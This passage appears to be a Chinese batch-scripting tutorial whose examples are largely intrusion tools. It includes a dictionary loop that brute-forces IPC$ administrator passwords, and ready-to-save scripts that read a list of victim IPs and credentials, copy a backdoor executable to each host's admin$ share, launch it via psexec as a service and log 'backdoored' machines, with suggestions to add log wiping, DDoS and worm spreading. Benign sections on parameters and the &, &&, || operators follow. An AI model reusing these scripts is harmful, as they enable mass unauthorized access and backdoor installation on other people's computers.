Windows常用的批处理命令大全

－　　for /f i%% in （dict.txt） do net use /ipipc$ ”i%%“ /u：”administrator“|find ”：命令成功完成“》》D:ok.txt ，这样就ko了。　　sample3：　　你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。　　主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）　　@for /f ”tokens=1，2，3 delims= “ %%i in （victim.txt） do start call door.bat %%i %%j %%k　　tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。　　而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。　　delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。　　代码雏形：　　--------- cut here then save as a batchfile（I call it main.bat ）---------　　@echo off　　@if ”%1“==”“ goto usage　　@for /f ”tokens=1，2，3 delims= “ %%i in （victim.txt） do start call IPChack.bat %%i %%j %%k　　@goto end　　：usage　　@echo run this batch in dos modle.or just double-click it.　　：end　　--------- cut here then save as a batchfile（I call it main.bat ） ---------　　--------- cut here then save as a batchfile（I call it door.bat） ---------　　@net use /%1ipc$ %3 /u：”%2“　　@if errorlevel 1 goto failed　　@echo Trying to establish the IPC$ connection …………OK　　@copy windrv32.exe/%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 》》ko.txt　　@psexec /%1 c:winntsystem32windrv32.exe　　@psexec /%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored 》》ko.txt　　：failed　　@echo Sorry can not connected to the victim.　　--------- cut here then save as a batchfile（I call it door.bat） ---------　　这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe），PSexec.exe需放在统一目录下。批处理内容　　尚可扩展，例如：加入清除日志+DDOS的功能，加入定时添加用户的功能，更深入一点可以使之具备自动传播功能（蠕虫）。此处不多做叙述，有兴趣的朋友可自行研究。　　二、如何在批处理文件中使用参数？　　批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。　　sample1：fomat.bat　　@echo off　　if ”%1“==”a“ format a：　　：format　　@format a:/q/u/auotset　　@echo please insert another disk to driver A.　　@pause　　@goto fomat　　这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵，好像有点画蛇添足了～^_^　　sample2：　　当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令了。　　@echo off　　@net use /1%ipc$ ”2%“ /u：”3%“ 注意哦，这里PASSWORD是第二个参数。　　@if errorlevel 1 echo connection failed　　怎么样，使用参数还是比较简单的吧？你这么帅一定学会了^_^.　　三、如何使用组合命令（Compound Command）？　　1、&　　Usage：第一条命令 & 第二条命令 ［& 第三条命令。。。］　　用这种方法可以同时执行多条命令，而不管命令是否执行成功　　Sample：　　C：》dir z： & dir c:Ex4rch　　The system cannot find the path specified.　　Volume in drive C has no label.　　Volume Serial Number is 0078-59FB　　Directory of c:Ex4rch　　2002-05-14 23:51 《DIR》 。　　2002-05-14 23:51 《DIR》 。。　　2002-05-14 23:51 14 sometips.gif　　2、&&　　Usage：第一条命令 && 第二条命令 ［&& 第三条命令。。。］　　用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令；　　Sample：　　C：》dir z： && dir c:Ex4rch　　The system cannot find the path specified.　　C：》dir c:Ex4rch && dir z：　　Volume in drive C has no label.　　Volume Serial Number is 0078-59FB　　Directory of c:Ex4rch　　2002-05-14 23:55 《DIR》 。　　2002-05-14 23:55 《DIR》 。。　　2002-05-14 23:55 14 sometips.gif　　1 File（s） 14 bytes　　2 Dir（s） 768，671，744 bytes free　　The system cannot find the path specified.　　在做备份的时候可能会用到这种命令会比较简单，如：　　dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup　　如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 ：）　　3、||　　Usage：第一条命令 || 第二条命令 ［|| 第三条命令。。。］　　用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令；　　Sample：　　C:Ex4rch》dir sometips.gif || del sometips.gif　　Volume in drive C has no label.　　Volume Serial Number is 0078-59FB　　Directory of C:Ex4rch　　2002-05-14 23:55 14 sometips.gif　　1 File（s） 14 bytes　　0 Dir（s） 768，696，320 by